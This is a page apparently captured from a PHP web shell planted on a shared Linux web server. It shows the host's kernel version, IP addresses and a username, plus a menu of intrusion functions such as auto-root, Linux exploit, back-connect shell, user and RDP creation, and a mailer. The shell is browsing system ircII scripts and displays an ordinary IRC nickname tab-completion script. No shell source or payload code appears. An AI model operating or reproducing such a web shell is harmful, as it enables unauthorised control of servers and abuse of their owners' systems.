Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
ircII /
script /
[ HOME SHELL ]
Name
Size
Permission
Action
2.8script
2.49
KB
-rw-r--r--
2.9script
954
B
-rw-r--r--
action
2.56
KB
-rw-r--r--
alias
895
B
-rw-r--r--
autoop
3.14
KB
-rw-r--r--
autoquery
2.54
KB
-rw-r--r--
basical
1.08
KB
-rw-r--r--
bigcheese
4.84
KB
-rw-r--r--
brc
2.33
KB
-rw-r--r--
channel
199
B
-rw-r--r--
columns
1.06
KB
-rw-r--r--
commander
1.29
KB
-rw-r--r--
compl.mods
12.63
KB
-rw-r--r--
complete
7.35
KB
-rw-r--r--
cursor
264
B
-rw-r--r--
dccchan
7.04
KB
-rw-r--r--
default
3.26
KB
-rw-r--r--
deutsch
381
B
-rw-r--r--
disc
225
B
-rw-r--r--
dmsg
419
B
-rw-r--r--
edit
1.02
KB
-rw-r--r--
english
480
B
-rw-r--r--
events
848
B
-rw-r--r--
extensions
498
B
-rw-r--r--
finger
1.08
KB
-rw-r--r--
fkeys
5.15
KB
-rw-r--r--
flood
171
B
-rw-r--r--
fnet
5.38
KB
-rw-r--r--
functions
5.52
KB
-rw-r--r--
global
387
B
-rw-r--r--
help
308
B
-rw-r--r--
history
1.72
KB
-rw-r--r--
history-match
1.46
KB
-rw-r--r--
icb
1.28
KB
-rw-r--r--
imap
8.33
KB
-rw-r--r--
ircIIhelp
344
B
-rw-r--r--
ircprimer
2.98
KB
-rw-r--r--
ircrc
154
B
-rw-r--r--
kickmenu
1.82
KB
-rw-r--r--
killpath
1009
B
-rw-r--r--
kpstat
1.29
KB
-rw-r--r--
list
224
B
-rw-r--r--
listidle
5.07
KB
-rw-r--r--
log
370
B
-rw-r--r--
lynx_ircrc
173
B
-rw-r--r--
meta1
179
B
-rw-r--r--
meta2
140
B
-rw-r--r--
msg
368
B
-rw-r--r--
mudlike
1.69
KB
-rw-r--r--
multichan
2.29
KB
-rw-r--r--
nemesis
501
B
-rw-r--r--
netsplit
4.2
KB
-rw-r--r--
newaway
899
B
-rw-r--r--
newformat
5.54
KB
-rw-r--r--
nicks
367
B
-rw-r--r--
nicksearch
1.72
KB
-rw-r--r--
nocolour
1.67
KB
-rw-r--r--
oldping
1.6
KB
-rw-r--r--
oper
453
B
-rw-r--r--
otherstatus
802
B
-rw-r--r--
ping
400
B
-rw-r--r--
prefix
268
B
-rw-r--r--
recursion
2.07
KB
-rw-r--r--
redirx
5.19
KB
-rw-r--r--
repeat
354
B
-rw-r--r--
screen
1.87
KB
-rw-r--r--
service
734
B
-rw-r--r--
shell
730
B
-rw-r--r--
silent
874
B
-rw-r--r--
smileys
320
B
-rw-r--r--
tabkey
3.62
KB
-rw-r--r--
time
734
B
-rw-r--r--
times
497
B
-rw-r--r--
traces
2.23
KB
-rw-r--r--
troy
7.01
KB
-rw-r--r--
uhnotify
1.74
KB
-rw-r--r--
undernet
484
B
-rw-r--r--
version
53
B
-rw-r--r--
voice
365
B
-rw-r--r--
wallopstat
1.36
KB
-rw-r--r--
whowas
1.77
KB
-rw-r--r--
window
453
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tabkey
# @(#) $eterna: tabkey,v 1.10 2011/03/01 02:55:15 mrg Exp $ #------------------------------------------------------------------------------# # updated for 2.2.2 # This keeps track of the nicks of people you MSG. You can then # just hit the tab key ^I to flip through the list of people # you sent MSGs to. # Assign tk.msgmax to the number of nicknames you wish to store # Modified by Chetnik (s902211@yallara.cs.rmit.oz.au) # and Daemon (frechett@spot.colorado.edu) # It will now keep unique nicknames in the list ordered from the most recent # message received or sent to the oldest message received or sent. # Ctrl R will flip thru the list backwards (Reverse). # Crtl-X Ctrl-X deletes the currently displayed or current nick from the list. # /addnick <nickname list> will add the nicknames to the list. # /nicklist will show the current list of names # If a nickname which has 'never' existed is messaged, it will not be added to # the list. # searches thru list forwards (tab) or backwards (ctrl R) bind ^I parse_command ^tk.getmsg 1 $tk.msglist bind ^R parse_command ^tk.getmsg -1 $tk.msglist # Delete current nickname or currently displayed nickname from list # XXX - mrg: disabled due to conflicts with 'screen'. #bind ^X^X parse_command tk.delnick # shows all the current nicknames in the list. alias nicklist echo *** Nickname List: $tk.msglist # Adds nicknames to the list.. alias addnick if ([$1]) { addnick $1- };tk.addmsg $0 $tk.msglist # Set this to the max number of nickname you want on the list at a time @ tk.msgmax = 10 # From here down are internal aliases and 'ON's. # This script uses SERIAL NUMBER #55 # keeps list of unique nicks from newest message to oldest message. alias tk.addmsg { @ tk.matched = rmatch($0 $^\1-) if (tk.matched) { @ tk.msglist = [$(0-${tk.matched-1}) $(${tk.matched+1}-)] } #else { @ tk.msglist = [$(0-${tk.msgmax-1})] } @ tk.msgcnt = 0 ^assign -tk.matched } # searches thru list forwards or backwards. ($0==1==forward),($0==-1==back) alias tk.getmsg { @ tk.msgcnt = tk.msgcnt + [$0] if ( #tk.msglist < tk.msgcnt ) {@ tk.msgcnt = 1} if (tk.msgcnt <= 0) {@ tk.msgcnt = #tk.msglist} @ tk.junk = K ## [msg] type ^U$tk.junk $^\^^{[$($tk.msgcnt)]} } # some initialisation. You can comment these out if you want to. # ^on #-401 55 * if ([$AUTO_WHOWAS] != [ON]) { ^whowas $1 } # ^on ^406 * { # ^assign tk.msglist $notword($rmatch($1 $tk.msglist) $tk.msglist) # if ([$AUTO_WHOWAS] == [ON]) { echo *** $1- } #} # Adds nick to list when message is sent or received. Doesn't effect output. on #-send_msg 55 * ^tk.addmsg $0 $tk.msglist on #-msg 55 * ^tk.addmsg $0 $tk.msglist on #-send_dcc_chat 55 * ^tk.addmsg \=$0 $tk.msglist on #-dcc_chat 55 * ^tk.addmsg \=$0 $tk.msglist # follow nick name changes on #-nick 55 * tk.followadd $0 $1 $tk.msglist alias tk.followadd { # if the nick is in the list, add the new nick @ tk.matched = rmatch($0 $^\2-) if (tk.matched) { addnick $1 } ^assign -tk.matched } # deletes current nick from list alias tk.delnick { if (tk.msgcnt == 0) { echo *** Nickname: $word(0 $tk.msglist) removed. @ tk.msglist = [$notword(1 $tk.msglist)] } { echo *** Nickname: $word(${tk.msgcnt-1} $tk.msglist) removed. @ tk.msglist = [$notword($tk.msgcnt $tk.msglist)] } type ^U } # The $notword() function. alias notword { if ([$0] > 0) { if (([$0] > 1) && ([$0] < rmatch($~ $1-))) { @ nw.sep = [ ] } { @ nw.sep = [] } @ function_return = [$(1-${[$0]-1})] ## [$nw.sep] ## [$(${[$0]+1}-)] } { @ function_return = [$1-] } } #------------------------------------------------------------------------------#
Close